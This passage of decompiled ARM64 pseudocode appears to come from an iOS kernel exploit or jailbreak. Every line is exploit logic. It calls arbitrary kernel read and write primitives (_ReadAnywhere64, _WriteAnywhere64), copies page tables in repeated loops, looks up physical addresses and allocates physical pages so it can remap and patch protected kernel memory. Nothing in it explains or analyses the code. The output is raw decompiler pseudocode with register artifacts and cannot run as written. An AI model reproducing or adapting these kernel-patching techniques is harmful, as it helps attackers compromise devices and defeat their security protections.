636.     for (*(r31 + 0x16d4) = r31; *(r31 + 0x16d4) < 0x800; *(r31 + 0x16d4) = *(r31 + 0x16d4) + 0x1) {
637.             r8 = 0x10001e1c8;
638.             r9 = *(r31 + 0x16d8);
639.             r11 = *(r31 + 0x16d4) << 0x3;
640.             asm { sxtw       x11, w11 };
641.             r0 = r9 + r11;
642.             r8 = r8;
643.             r9 = *(r31 + 0x16d4) << 0x3;
644.             asm { sxtw       x9, w9 };
645.             *(r31 + 0xe40) = r0;
646.             *(r31 + 0xe38) = _ReadAnywhere64();
647.             *(r31 + 0xe30) = _WriteAnywhere64();
648.     }
649.     *(r31 + 0x16c8) = _ReadAnywhere64();
650.     *(r31 + 0x16c0) = ((*(r31 + 0x16c8) & 0xfffffffffffff000) - 0x10001e1d0) + 0x10001e1d8;
651.     for (*(r31 + 0x16bc) = r31; *(r31 + 0x16bc) < 0x800; *(r31 + 0x16bc) = *(r31 + 0x16bc) + 0x1) {
652.             r8 = *(r31 + 0x17b0);
653.             r10 = *(r31 + 0x16bc) << 0x3;
654.             asm { sxtw       x10, w10 };
655.             r0 = r8 + r10;
656.             r8 = *(r31 + 0x16c0);
657.             r10 = *(r31 + 0x16bc) << 0x3;
658.             asm { sxtw       x10, w10 };
659.             *(r31 + 0xe28) = r0;
660.             *(r31 + 0xe20) = _ReadAnywhere64();
661.             *(r31 + 0xe18) = _WriteAnywhere64();
662.     }
663.     r8 = *(r31 + 0x16c8) & 0xfff;
664.     *(r31 + 0xe10) = r8;
665.     *(r31 + 0x16c8) = *(r31 + 0xe10) | _findphys_real() & 0xfffffffffffff000;
666.     r0 = _WriteAnywhere64();
667.     *(r31 + 0x1738) = *(r31 + 0x1738) + 0x1;
668.     r8 = *(r31 + 0x1750) + *(r31 + 0x1738) * 0x8;
669.     *(r31 + 0xe08) = r0;
670.     *(r31 + 0xe00) = r8;
671.     _findphys_real() + 0x70;
672.     r0 = _WriteAnywhere64();
673.     *(r31 + 0x1738) = *(r31 + 0x1738) + 0x1;
674.     r8 = *(r31 + 0x1750) + *(r31 + 0x1738) * 0x8;
675.     *(r31 + 0xdf8) = r0;
676.     *(r31 + 0xdf0) = r8;
677.     _constget() + 0x10001e1b8;
678.     r0 = _WriteAnywhere64();
679.     *(r31 + 0x1738) = *(r31 + 0x1738) + 0x1;
680.     r8 = *(r31 + 0x1750) + *(r31 + 0x1738) * 0x8;
681.     *(r31 + 0xde8) = r0;
682.     r0 = _WriteAnywhere64();
683.     *(r31 + 0x1738) = *(r31 + 0x1738) + 0x1;
684.     r8 = *(r31 + 0x1750) + *(r31 + 0x1738) * 0x8;
685.     *(r31 + 0xde0) = r0;
686.     *(r31 + 0xdd8) = r8;
687.     _constget() + 0x10001e1b8;
688.     r0 = _WriteAnywhere64();
689.     *(r31 + 0x1738) = *(r31 + 0x1738) + 0x1;
690.     r9 = *(r31 + 0x1750) + *(r31 + 0x1738) * 0x8;
691.     *(r31 + 0xdd0) = r0;
692.     r0 = _WriteAnywhere64();
693.     *(r31 + 0x1738) = *(r31 + 0x1738) + 0x1;
694.     r8 = *(r31 + 0x1750) + *(r31 + 0x1738) * 0x8;
695.     *(r31 + 0xdc8) = r0;
696.     *(r31 + 0xdc0) = r8;
697.     _constget() + 0x10001e1b8;
698.     r0 = _WriteAnywhere64();
699.     *(r31 + 0x1738) = *(r31 + 0x1738) + 0x1;
700.     r9 = *(r31 + 0x1750) + *(r31 + 0x1738) * 0x8;
701.     *(r31 + 0xdb8) = r0;
702.     r0 = _WriteAnywhere64();
703.     *(r31 + 0x1738) = *(r31 + 0x1738) + 0x1;
704.     r8 = *(r31 + 0x1750) + *(r31 + 0x1738) * 0x8;
705.     *(r31 + 0xdb0) = r0;
706.     *(r31 + 0xda8) = r8;
707.     _constget() + 0x10001e1b8;
708.     r0 = _WriteAnywhere64();
709.     *(r31 + 0x1738) = *(r31 + 0x1738) + 0x1;
710.     r11 = *(r31 + 0x1750) + *(r31 + 0x1738) * 0x8;
711.     *(r31 + 0xda0) = r0;
712.     r0 = _WriteAnywhere64();
713.     *(r31 + 0x1738) = *(r31 + 0x1738) + 0x1;
714.     r8 = *(r31 + 0x1750) + *(r31 + 0x1738) * 0x8;
715.     *(r31 + 0xd98) = r0;
716.     *(r31 + 0xd90) = r8;
717.     _constget() + 0x10001e1b8;
718.     r0 = _WriteAnywhere64();
719.     *(r31 + 0x1738) = *(r31 + 0x1738) + 0x1;
720.     r9 = *(r31 + 0x1750) + *(r31 + 0x1738) * 0x8;
721.     *(r31 + 0xd88) = r0;
722.     r0 = _WriteAnywhere64();
723.     *(r31 + 0x1738) = *(r31 + 0x1738) + 0x1;
724.     r8 = *(r31 + 0x1750) + *(r31 + 0x1738) * 0x8;
725.     *(r31 + 0xd80) = r0;
726.     *(r31 + 0xd78) = r8;
727.     _constget() + 0x10001e1b8;
728.     r0 = _WriteAnywhere64();
729.     *(r31 + 0x1738) = *(r31 + 0x1738) + 0x1;
730.     r9 = *(r31 + 0x1750) + *(r31 + 0x1738) * 0x8;
731.     *(r31 + 0xd70) = r0;
732.     r0 = _WriteAnywhere64();
733.     *(r31 + 0x1738) = *(r31 + 0x1738) + 0x1;
734.     r8 = *(r31 + 0x1750) + *(r31 + 0x1738) * 0x8;
735.     *(r31 + 0xd68) = r0;
736.     *(r31 + 0xd60) = r8;
737.     _constget() + 0x10001e1b8;
738.     r0 = _WriteAnywhere64();
739.     *(r31 + 0x1738) = *(r31 + 0x1738) + 0x1;
740.     r8 = *(r31 + 0x1750) + *(r31 + 0x1738) * 0x8;
741.     *(r31 + 0xd58) = r0;
742.     *(r31 + 0xd50) = r8;
743.     (zero_extend_64(0x0) - ((_constget() & 0xfffffffffffff000) + 0x10001e1b8 - 0x10001e1d8) + 0x10001e1d0) + *(r31 + 0x1748) + 0x240;
744.     r0 = _WriteAnywhere64();
745.     *(r31 + 0x1738) = *(r31 + 0x1738) + 0x1;
746.     r8 = *(r31 + 0x1750) + *(r31 + 0x1738) * 0x8;
747.     *(r31 + 0xd48) = r0;
748.     *(r31 + 0xd40) = r8;
749.     _constget() + 0x10001e1b8;
750.     r0 = _WriteAnywhere64();
751.     *(r31 + 0x1738) = *(r31 + 0x1738) + 0x1;
752.     r9 = *(r31 + 0x1750) + *(r31 + 0x1738) * 0x8;
753.     *(r31 + 0xd38) = r0;
754.     r0 = _WriteAnywhere64();
755.     *(r31 + 0x1738) = *(r31 + 0x1738) + 0x1;
756.     r8 = *(r31 + 0x1750) + *(r31 + 0x1738) * 0x8;
757.     *(r31 + 0xd30) = r0;
758.     *(r31 + 0xd28) = r8;
759.     _constget() + 0x10001e1b8;
760.     r0 = _WriteAnywhere64();
761.     *(r31 + 0x1738) = *(r31 + 0x1738) + 0x1;
762.     r9 = *(r31 + 0x1750) + *(r31 + 0x1738) * 0x8;
763.     *(r31 + 0xd20) = r0;
764.     r0 = _WriteAnywhere64();
765.     *(r31 + 0x1738) = *(r31 + 0x1738) + 0x1;
766.     r8 = *(r31 + 0x1750) + *(r31 + 0x1738) * 0x8;
767.     *(r31 + 0xd18) = r0;
768.     *(r31 + 0xd10) = r8;
769.     _constget() + 0x10001e1b8;
770.     r0 = _WriteAnywhere64();
771.     r8 = *(r31 + 0x1748) + 0x20c;
772.     *(r31 + 0xd08) = r0;
773.     *(r31 + 0xd00) = r8;
774.     _constget() + 0x10001e1b8;
775.     r0 = _WriteAnywhere64();
776.     r8 = *(r31 + 0x1748) + 0x200;
777.     *(r31 + 0xcf8) = r0;
778.     *(r31 + 0xcf0) = r8;
779.     _constget() + 0x10001e1b8;
780.     r0 = _WriteAnywhere64();
781.     *(r31 + 0x1738) = *(r31 + 0x1738) + 0x1;
782.     r8 = *(r31 + 0x1750) + *(r31 + 0x1738) * 0x8;
783.     *(r31 + 0xce8) = r0;
784.     *(r31 + 0xce0) = r8;
785.     _constget() + 0x10001e1f8;
786.     r0 = _WriteAnywhere64();
787.     *(r31 + 0x1738) = *(r31 + 0x1738) + 0x1;
788.     r8 = *(r31 + 0x1750) + *(r31 + 0x1738) * 0x8;
789.     *(r31 + 0xcd8) = r0;
790.     *(r31 + 0xcd0) = r8;
791.     _constget() + 0x10001e1b8;
792.     r0 = _WriteAnywhere64();
793.     *(r31 + 0x1738) = *(r31 + 0x1738) + 0x1;
794.     r9 = *(r31 + 0x1750) + *(r31 + 0x1738) * 0x8;
795.     *(r31 + 0xcc8) = r0;
796.     r0 = _WriteAnywhere64();
797.     *(r31 + 0x1738) = *(r31 + 0x1738) + 0x1;
798.     r8 = *(r31 + 0x1750) + *(r31 + 0x1738) * 0x8;
799.     *(r31 + 0xcc0) = r0;
800.     *(r31 + 0xcb8) = r8;
801.     _constget() + 0x10001e1b8;
802.     r0 = _WriteAnywhere64();
803.     *(r31 + 0x1738) = *(r31 + 0x1738) + 0x1;
804.     r9 = *(r31 + 0x1750) + *(r31 + 0x1738) * 0x8;
805.     *(r31 + 0xcb0) = r0;
806.     r0 = _WriteAnywhere64();
807.     *(r31 + 0x1738) = *(r31 + 0x1738) + 0x1;
808.     r8 = *(r31 + 0x1750) + *(r31 + 0x1738) * 0x8;
809.     *(r31 + 0xca8) = r0;
810.     *(r31 + 0xca0) = r8;
811.     _constget() + 0x10001e1b8;
812.     r0 = _WriteAnywhere64();
813.     *(r31 + 0x1738) = *(r31 + 0x1738) + 0x1;
814.     r9 = *(r31 + 0x1750) + *(r31 + 0x1738) * 0x8;
815.     *(r31 + 0xc98) = r0;
816.     r0 = _WriteAnywhere64();
817.     *(r31 + 0x1738) = *(r31 + 0x1738) + 0x1;
818.     r8 = *(r31 + 0x1750) + *(r31 + 0x1738) * 0x8;
819.     *(r31 + 0xc90) = r0;
820.     *(r31 + 0xc88) = r8;
821.     _constget() + 0x10001e1b8;
822.     r0 = _WriteAnywhere64();
823.     *(r31 + 0x1738) = *(r31 + 0x1738) + 0x1;
824.     r9 = *(r31 + 0x1750) + *(r31 + 0x1738) * 0x8;
825.     *(r31 + 0xc80) = r0;
826.     r0 = _WriteAnywhere64();
827.     *(r31 + 0x1738) = *(r31 + 0x1738) + 0x1;
828.     r8 = *(r31 + 0x1750) + *(r31 + 0x1738) * 0x8;
829.     *(r31 + 0xc78) = r0;
830.     *(r31 + 0xc70) = r8;
831.     _constget() + 0x10001e1b8;
832.     r0 = _WriteAnywhere64();
833.     *(r31 + 0x1738) = *(r31 + 0x1738) + 0x1;
834.     r8 = *(r31 + 0x1750) + *(r31 + 0x1738) * 0x8;
835.     *(r31 + 0xc68) = r0;
836.     *(r31 + 0xc60) = r8;
837.     _constget() + 0x10001e1f8;
838.     r0 = _WriteAnywhere64();
839.     *(r31 + 0x1738) = *(r31 + 0x1738) + 0x1;
840.     r8 = *(r31 + 0x1750) + *(r31 + 0x1738) * 0x8;
841.     *(r31 + 0xc58) = r0;
842.     *(r31 + 0xc50) = r8;
843.     _constget() + 0x10001e1b8;
844.     r0 = _WriteAnywhere64();
845.     *(r31 + 0x1738) = *(r31 + 0x1738) + 0x1;
846.     r9 = *(r31 + 0x1750) + *(r31 + 0x1738) * 0x8;
847.     *(r31 + 0xc48) = r0;
848.     r0 = _WriteAnywhere64();
849.     *(r31 + 0x1738) = *(r31 + 0x1738) + 0x1;
850.     r8 = *(r31 + 0x1750) + *(r31 + 0x1738) * 0x8;
851.     *(r31 + 0xc40) = r0;
852.     *(r31 + 0xc38) = r8;
853.     _constget() + 0x10001e1b8;
854.     r0 = _WriteAnywhere64();
855.     *(r31 + 0x1738) = *(r31 + 0x1738) + 0x1;
856.     r9 = *(r31 + 0x1750) + *(r31 + 0x1738) * 0x8;
857.     *(r31 + 0xc30) = r0;
858.     r0 = _WriteAnywhere64();
859.     *(r31 + 0x1738) = *(r31 + 0x1738) + 0x1;
860.     r8 = *(r31 + 0x1750) + *(r31 + 0x1738) * 0x8;
861.     *(r31 + 0xc28) = r0;
862.     *(r31 + 0xc20) = r8;
863.     _constget() + 0x10001e1b8;
864.     r0 = _WriteAnywhere64();
865.     *(r31 + 0x1738) = *(r31 + 0x1738) + 0x1;
866.     r9 = *(r31 + 0x1750) + *(r31 + 0x1738) * 0x8;
867.     *(r31 + 0xc18) = r0;
868.     r0 = _WriteAnywhere64();
869.     *(r31 + 0x1738) = *(r31 + 0x1738) + 0x1;
870.     r8 = *(r31 + 0x1750) + *(r31 + 0x1738) * 0x8;
871.     *(r31 + 0xc10) = r0;
872.     *(r31 + 0xc08) = r8;
873.     _constget() + 0x10001e1b8;
874.     r0 = _WriteAnywhere64();
875.     *(r31 + 0x1738) = *(r31 + 0x1738) + 0x1;
876.     r9 = *(r31 + 0x1750) + *(r31 + 0x1738) * 0x8;
877.     *(r31 + 0xc00) = r0;
878.     r0 = _WriteAnywhere64();
879.     *(r31 + 0x1738) = *(r31 + 0x1738) + 0x1;
880.     r8 = *(r31 + 0x1750) + *(r31 + 0x1738) * 0x8;
881.     *(r31 + 0xbf8) = r0;
882.     *(r31 + 0xbf0) = r8;
883.     _constget() + 0x10001e1b8;
884.     r0 = _WriteAnywhere64();
885.     *(r31 + 0x1738) = *(r31 + 0x1738) + 0x1;
886.     r9 = *(r31 + 0x1750) + *(r31 + 0x1738) * 0x8;
887.     *(r31 + 0xbe8) = r0;
888.     r0 = _WriteAnywhere64();
889.     *(r31 + 0x1738) = *(r31 + 0x1738) + 0x1;
890.     r8 = *(r31 + 0x1750) + *(r31 + 0x1738) * 0x8;
891.     *(r31 + 0xbe0) = r0;
892.     *(r31 + 0xbd8) = r8;
893.     _constget() + 0x10001e1b8;
894.     r0 = _WriteAnywhere64();
895.     *(r31 + 0x1738) = *(r31 + 0x1738) + 0x1;
896.     r9 = *(r31 + 0x1750) + *(r31 + 0x1738) * 0x8;
897.     *(r31 + 0xbd0) = r0;
898.     r0 = _WriteAnywhere64();
899.     *(r31 + 0x1738) = *(r31 + 0x1738) + 0x1;
900.     r8 = *(r31 + 0x1750) + *(r31 + 0x1738) * 0x8;
901.     *(r31 + 0xbc8) = r0;
902.     *(r31 + 0xbc0) = r8;
903.     _constget() + 0x10001e1b8;
904.     r0 = _WriteAnywhere64();
905.     *(r31 + 0x1738) = *(r31 + 0x1738) + 0x1;
906.     r9 = *(r31 + 0x1750) + *(r31 + 0x1738) * 0x8;
907.     *(r31 + 0xbb8) = r0;
908.     r0 = _WriteAnywhere64();
909.     *(r31 + 0x1738) = *(r31 + 0x1738) + 0x1;
910.     r8 = *(r31 + 0x1750) + *(r31 + 0x1738) * 0x8;
911.     *(r31 + 0xbb0) = r0;
912.     *(r31 + 0xba8) = r8;
913.     _constget() + 0x10001e1b8;
914.     r0 = _WriteAnywhere64();
915.     *(r31 + 0x1738) = *(r31 + 0x1738) + 0x1;
916.     r9 = *(r31 + 0x1750) + *(r31 + 0x1738) * 0x8;
917.     *(r31 + 0xba0) = r0;
918.     r0 = _WriteAnywhere64();
919.     *(r31 + 0x1738) = *(r31 + 0x1738) + 0x1;
920.     r8 = *(r31 + 0x1750) + *(r31 + 0x1738) * 0x8;
921.     *(r31 + 0xb98) = r0;
922.     *(r31 + 0xb90) = r8;
923.     _constget() + 0x10001e1b8;
924.     r0 = _WriteAnywhere64();
925.     *(r31 + 0x1738) = *(r31 + 0x1738) + 0x1;
926.     r9 = *(r31 + 0x1750) + *(r31 + 0x1738) * 0x8;
927.     *(r31 + 0xb88) = r0;
928.     r0 = _WriteAnywhere64();
929.     *(r31 + 0x1738) = *(r31 + 0x1738) + 0x1;
930.     r8 = *(r31 + 0x1750) + *(r31 + 0x1738) * 0x8;
931.     *(r31 + 0xb80) = r0;
932.     *(r31 + 0xb78) = r8;
933.     _constget() + 0x10001e1b8;
934.     r0 = _WriteAnywhere64();
935.     *(r31 + 0x1738) = *(r31 + 0x1738) + 0x1;
936.     r8 = *(r31 + 0x1750) + *(r31 + 0x1738) * 0x8;
937.     *(r31 + 0xb70) = r0;
938.     *(r31 + 0xb68) = r8;
939.     _constget() + 0x10001e1f8;
940.     r0 = _WriteAnywhere64();
941.     *(r31 + 0x1738) = *(r31 + 0x1738) + 0x1;
942.     r8 = *(r31 + 0x1750) + *(r31 + 0x1738) * 0x8;
943.     *(r31 + 0xb60) = r0;
944.     *(r31 + 0xb58) = r8;
945.     _constget() + 0x10001e1b8;
946.     r0 = _WriteAnywhere64();
947.     *(r31 + 0x1738) = *(r31 + 0x1738) + 0x1;
948.     r9 = *(r31 + 0x1750) + *(r31 + 0x1738) * 0x8;
949.     *(r31 + 0xb50) = r0;
950.     r0 = _WriteAnywhere64();
951.     *(r31 + 0x1738) = *(r31 + 0x1738) + 0x1;
952.     r8 = *(r31 + 0x1750) + *(r31 + 0x1738) * 0x8;
953.     *(r31 + 0xb48) = r0;
954.     *(r31 + 0xb40) = r8;
955.     _constget() + 0x10001e1b8;
956.     r0 = _WriteAnywhere64();
957.     *(r31 + 0x1738) = *(r31 + 0x1738) + 0x1;
958.     r9 = *(r31 + 0x1750) + *(r31 + 0x1738) * 0x8;
959.     *(r31 + 0xb38) = r0;
960.     r0 = _WriteAnywhere64();
961.     *(r31 + 0x1738) = *(r31 + 0x1738) + 0x1;
962.     r8 = *(r31 + 0x1750) + *(r31 + 0x1738) * 0x8;
963.     *(r31 + 0xb30) = r0;
964.     *(r31 + 0xb28) = r8;
965.     _constget() + 0x10001e1b8;
966.     r0 = _WriteAnywhere64();
967.     *(r31 + 0x17b8) = *(r31 + 0x17a0) + 0x8;
968.     *(r31 + 0x17af) = r31;
969.     *(r31 + 0xb20) = r0;
970.     NSLog(@"enter");
971.     *(r31 + 0x17d0) = *(r31 + 0x17a0) + 0x8;
972.     *(r31 + 0xb18) = *(r31 + 0x1708) + *(r31 + 0x1780);
973.     *(r31 + 0x17c8) = 0x10001e1d8 + (*(r31 + 0xb18) - _constget() + 0x10001e1b8);
974.     goto loc_100012da4;
975.  
976. loc_100012da4:
977.     *(r31 + 0x1520) = r31;
978.     *(r31 + 0x1518) = r31;
979.     *(r31 + 0x1518) = _constget() + 0x10001e1b8;
980.     r30 = *(r31 + 0x1518) & 0xffffffffffffc000;
981.     r8 = *(r31 + 0x17b0);
982.     r0 = (r30 >> 0x19 & 0x7ff) << 0x3;
983.     asm { sxtw       x0, w0 };
984.     *(r31 + 0x1510) = _ReadAnywhere64();
985.     *(r31 + 0x1508) = _physalloc();
986.     for (*(r31 + 0x1504) = r31; *(r31 + 0x1504) < 0x800; *(r31 + 0x1504) = *(r31 + 0x1504) + 0x1) {
987.             r8 = 0x10001e1d8;
988.             r9 = 0x10001e1d0;
989.             r10 = *(r31 + 0x1508);
990.             r12 = *(r31 + 0x1504) << 0x3;
991.             asm { sxtw       x12, w12 };
992.             r0 = r10 + r12;
993.             r8 = ((*(r31 + 0x1510) & 0xfffffffffffff000) - r9) + r8;
994.             r9 = *(r31 + 0x1504) << 0x3;
995.             asm { sxtw       x9, w9 };
996.             *(r31 + 0x9c0) = r0;
997.             *(r31 + 0x9b8) = _ReadAnywhere64();
998.             *(r31 + 0x9b0) = _WriteAnywhere64();
999.     }
1000.     r8 = *(r31 + 0x1510) & 0xfff;
1001.     *(r31 + 0x9a8) = r8;
1002.     *(r31 + 0x1510) = *(r31 + 0x9a8) | _findphys_real() & 0xfffffffffffff000;
1003.     r0 = *(r31 + 0x17b0);
1004.     r8 = (0x10001e1e8 >> 0x19 & 0x7ff) << 0x3;
1005.     asm { sxtw       x8, w8 };
1006.     *(r31 + 0x9a0) = _WriteAnywhere64();
1007.     *(r31 + 0x1520) = _physalloc();
1008.     r0 = *(r31 + 0x1508);
1009.     r8 = (0x10001e1e8 >> 0xe & 0x7ff) << 0x3;
1010.     asm { sxtw       x8, w8 };
1011.     *(r31 + 0x14f8) = _ReadAnywhere64();
1012.     for (*(r31 + 0x14f4) = r31; *(r31 + 0x14f4) < 0x800; *(r31 + 0x14f4) = *(r31 + 0x14f4) + 0x1) {
1013.             r8 = 0x10001e1d8;
1014.             r9 = 0x10001e1d0;
1015.             r10 = *(r31 + 0x1520);
1016.             r12 = *(r31 + 0x14f4) << 0x3;
1017.             asm { sxtw       x12, w12 };
1018.             r0 = r10 + r12;
1019.             r8 = ((*(r31 + 0x14f8) & 0xfffffffffffff000) - r9) + r8;
1020.             r9 = *(r31 + 0x14f4) << 0x3;
1021.             asm { sxtw       x9, w9 };
1022.             *(r31 + 0x998) = r0;
1023.             *(r31 + 0x990) = _ReadAnywhere64();
1024.             *(r31 + 0x988) = _WriteAnywhere64();
1025.     }
1026.     r8 = *(r31 + 0x14f8) & 0xfff;
1027.     *(r31 + 0x980) = r8;
1028.     *(r31 + 0x14f8) = *(r31 + 0x980) | _findphys_real() & 0xfffffffffffff000;
1029.     r0 = *(r31 + 0x1508);
1030.     r8 = (0x10001e1e8 >> 0xe & 0x7ff) << 0x3;
1031.     asm { sxtw       x8, w8 };
1032.     *(r31 + 0x978) = _WriteAnywhere64();
1033.     NSLog(@"%llx", *(r31 + 0x1520));
1034.     *(r31 + 0x970) = _WriteAnywhere32(*(r31 + 0x1520) + (*(r31 + 0x1518) & 0x3fff), r31 | 0x1);
1035.     *(r31 + 0x1518) = _constget() + 0x10001e1b8;
1036.     r8 = *(r31 + 0x1518) & 0xffffffffffffc000;
1037.     r0 = *(r31 + 0x17b0);
1038.     r8 = (r8 >> 0x19 & 0x7ff) << 0x3;
1039.     asm { sxtw       x8, w8 };
1040.     *(r31 + 0x14e8) = _ReadAnywhere64();
1041.     *(r31 + 0x14e0) = _physalloc();
1042.     for (*(r31 + 0x14dc) = r31; *(r31 + 0x14dc) < 0x800; *(r31 + 0x14dc) = *(r31 + 0x14dc) + 0x1) {
1043.             r8 = 0x10001e1d8;
1044.             r9 = 0x10001e1d0;
1045.             r10 = *(r31 + 0x14e0);
1046.             r12 = *(r31 + 0x14dc) << 0x3;
1047.             asm { sxtw       x12, w12 };
1048.             r0 = r10 + r12;
1049.             r8 = ((*(r31 + 0x14e8) & 0xfffffffffffff000) - r9) + r8;
1050.             r9 = *(r31 + 0x14dc) << 0x3;
1051.             asm { sxtw       x9, w9 };
1052.             *(r31 + 0x968) = r0;
1053.             *(r31 + 0x960) = _ReadAnywhere64();
1054.             *(r31 + 0x958) = _WriteAnywhere64();
1055.     }
1056.     r8 = *(r31 + 0x14e8) & 0xfff;
1057.     *(r31 + 0x950) = r8;
1058.     *(r31 + 0x14e8) = *(r31 + 0x950) | _findphys_real() & 0xfffffffffffff000;
1059.     r0 = *(r31 + 0x17b0);
1060.     r8 = (0x10001e1e8 >> 0x19 & 0x7ff) << 0x3;
1061.     asm { sxtw       x8, w8 };
1062.     *(r31 + 0x948) = _WriteAnywhere64();
1063.     *(r31 + 0x1520) = _physalloc();
1064.     r0 = *(r31 + 0x14e0);
1065.     r8 = (0x10001e1e8 >> 0xe & 0x7ff) << 0x3;
1066.     asm { sxtw       x8, w8 };
1067.     *(r31 + 0x14d0) = _ReadAnywhere64();
1068.     for (*(r31 + 0x14cc) = r31; *(r31 + 0x14cc) < 0x800; *(r31 + 0x14cc) = *(r31 + 0x14cc) + 0x1) {
1069.             r8 = 0x10001e1d8;
1070.             r9 = 0x10001e1d0;
1071.             r10 = *(r31 + 0x1520);
1072.             r12 = *(r31 + 0x14cc) << 0x3;
1073.             asm { sxtw       x12, w12 };
1074.             r0 = r10 + r12;
1075.             r8 = ((*(r31 + 0x14d0) & 0xfffffffffffff000) - r9) + r8;
1076.             r9 = *(r31 + 0x14cc) << 0x3;
1077.             asm { sxtw       x9, w9 };
1078.             *(r31 + 0x940) = r0;
1079.             *(r31 + 0x938) = _ReadAnywhere64();
1080.             *(r31 + 0x930) = _WriteAnywhere64();
1081.     }
1082.     r8 = *(r31 + 0x14d0) & 0xfff;
1083.     *(r31 + 0x928) = r8;
1084.     *(r31 + 0x14d0) = *(r31 + 0x928) | _findphys_real() & 0xfffffffffffff000;
1085.     r0 = *(r31 + 0x14e0);
1086.     r8 = (0x10001e1e8 >> 0xe & 0x7ff) << 0x3;
1087.     asm { sxtw       x8, w8 };
1088.     r0 = _WriteAnywhere64();
1089.     r8 = *(r31 + 0x1520) + (*(r31 + 0x1518) & 0x3fff);
1090.     *(r31 + 0x920) = r0;
1091.     *(r31 + 0x918) = r8;
1092.     _constget() + 0x10001e1b8;
1093.     *(r31 + 0x910) = _WriteAnywhere64();
1094.     *(r31 + 0x1518) = _constget() + 0x10001e1b8;
1095.     r8 = *(r31 + 0x1518) & 0xffffffffffffc000;
1096.     r0 = *(r31 + 0x17b0);
1097.     r8 = (r8 >> 0x19 & 0x7ff) << 0x3;
1098.     asm { sxtw       x8, w8 };
1099.     *(r31 + 0x14c0) = _ReadAnywhere64();
1100.     *(r31 + 0x14b8) = _physalloc();
1101.     for (*(r31 + 0x14b4) = r31; *(r31 + 0x14b4) < 0x800; *(r31 + 0x14b4) = *(r31 + 0x14b4) + 0x1) {
1102.             r8 = 0x10001e1d8;
1103.             r9 = 0x10001e1d0;
1104.             r10 = *(r31 + 0x14b8);
1105.             r12 = *(r31 + 0x14b4) << 0x3;
1106.             asm { sxtw       x12, w12 };
1107.             r0 = r10 + r12;
1108.             r8 = ((*(r31 + 0x14c0) & 0xfffffffffffff000) - r9) + r8;
1109.             r9 = *(r31 + 0x14b4) << 0x3;
1110.             asm { sxtw       x9, w9 };
1111.             *(r31 + 0x908) = r0;
1112.             *(r31 + 0x900) = _ReadAnywhere64();
1113.             *(r31 + 0x8f8) = _WriteAnywhere64();
1114.     }
1115.     r8 = *(r31 + 0x14c0) & 0xfff;
1116.     *(r31 + 0x8f0) = r8;
1117.     *(r31 + 0x14c0) = *(r31 + 0x8f0) | _findphys_real() & 0xfffffffffffff000;
1118.     r0 = *(r31 + 0x17b0);
1119.     r8 = (0x10001e1e8 >> 0x19 & 0x7ff) << 0x3;
1120.     asm { sxtw       x8, w8 };
1121.     *(r31 + 0x8e8) = _WriteAnywhere64();
1122.     *(r31 + 0x1520) = _physalloc();
1123.     r0 = *(r31 + 0x14b8);
1124.     r8 = (0x10001e1e8 >> 0xe & 0x7ff) << 0x3;
1125.     asm { sxtw       x8, w8 };
1126.     *(r31 + 0x14a8) = _ReadAnywhere64();
1127.     for (*(r31 + 0x14a4) = r31; *(r31 + 0x14a4) < 0x800; *(r31 + 0x14a4) = *(r31 + 0x14a4) + 0x1) {
1128.             r8 = 0x10001e1d8;
1129.             r9 = 0x10001e1d0;
1130.             r10 = *(r31 + 0x1520);
1131.             r12 = *(r31 + 0x14a4) << 0x3;
1132.             asm { sxtw       x12, w12 };
1133.             r0 = r10 + r12;
1134.             r8 = ((*(r31 + 0x14a8) & 0xfffffffffffff000) - r9) + r8;
1135.             r9 = *(r31 + 0x14a4) << 0x3;
1136.             asm { sxtw       x9, w9 };
1137.             *(r31 + 0x8e0) = r0;
1138.             *(r31 + 0x8d8) = _ReadAnywhere64();
1139.             *(r31 + 0x8d0) = _WriteAnywhere64();
1140.     }
1141.     r8 = *(r31 + 0x14a8) & 0xfff;
1142.     *(r31 + 0x8c8) = r8;
1143.     *(r31 + 0x14a8) = *(r31 + 0x8c8) | _findphys_real() & 0xfffffffffffff000;
1144.     r0 = *(r31 + 0x14b8);
1145.     r8 = (0x10001e1e8 >> 0xe & 0x7ff) << 0x3;
1146.     asm { sxtw       x8, w8 };
1147.     r0 = _WriteAnywhere64();
1148.     r8 = *(r31 + 0x1520) + (*(r31 + 0x1518) & 0x3fff);
1149.     *(r31 + 0x8c0) = r0;
1150.     *(r31 + 0x8b8) = r8;
1151.     _constget() + 0x10001e1b8;
1152.     r0 = _WriteAnywhere64();
1153.     *(r31 + 0x1518) = *(r31 + 0x17b8);
1154.     r8 = *(r31 + 0x1518) & 0xffffffffffffc000;
1155.     r1 = *(r31 + 0x17b0);
1156.     r8 = (r8 >> 0x19 & 0x7ff) << 0x3;
1157.     asm { sxtw       x8, w8 };
1158.     *(r31 + 0x8b0) = r0;
1159.     *(r31 + 0x1498) = _ReadAnywhere64();
1160.     *(r31 + 0x1490) = _physalloc();
1161.     for (*(r31 + 0x148c) = r31; *(r31 + 0x148c) < 0x800; *(r31 + 0x148c) = *(r31 + 0x148c) + 0x1) {
1162.             r8 = 0x10001e1d8;
1163.             r9 = 0x10001e1d0;
1164.             r10 = *(r31 + 0x1490);
1165.             r12 = *(r31 + 0x148c) << 0x3;
1166.             asm { sxtw       x12, w12 };
1167.             r0 = r10 + r12;
1168.             r8 = ((*(r31 + 0x1498) & 0xfffffffffffff000) - r9) + r8;
1169.             r9 = *(r31 + 0x148c) << 0x3;
1170.             asm { sxtw       x9, w9 };
1171.             *(r31 + 0x8a8) = r0;
1172.             *(r31 + 0x8a0) = _ReadAnywhere64();
1173.             *(r31 + 0x898) = _WriteAnywhere64();
1174.     }
1175.     r8 = *(r31 + 0x1498) & 0xfff;
1176.     *(r31 + 0x890) = r8;
1177.     *(r31 + 0x1498) = *(r31 + 0x890) | _findphys_real() & 0xfffffffffffff000;
1178.     r0 = *(r31 + 0x17b0);
1179.     r8 = (0x10001e1e8 >> 0x19 & 0x7ff) << 0x3;
1180.     asm { sxtw       x8, w8 };
1181.     *(r31 + 0x888) = _WriteAnywhere64();
1182.     *(r31 + 0x1520) = _physalloc();
1183.     r0 = *(r31 + 0x1490);
1184.     r8 = (0x10001e1e8 >> 0xe & 0x7ff) << 0x3;
1185.     asm { sxtw       x8, w8 };
1186.     *(r31 + 0x1480) = _ReadAnywhere64();
1187.     for (*(r31 + 0x147c) = r31; *(r31 + 0x147c) < 0x800; *(r31 + 0x147c) = *(r31 + 0x147c) + 0x1) {
1188.             r8 = 0x10001e1d8;
1189.             r9 = 0x10001e1d0;
1190.             r10 = *(r31 + 0x1520);
1191.             r12 = *(r31 + 0x147c) << 0x3;
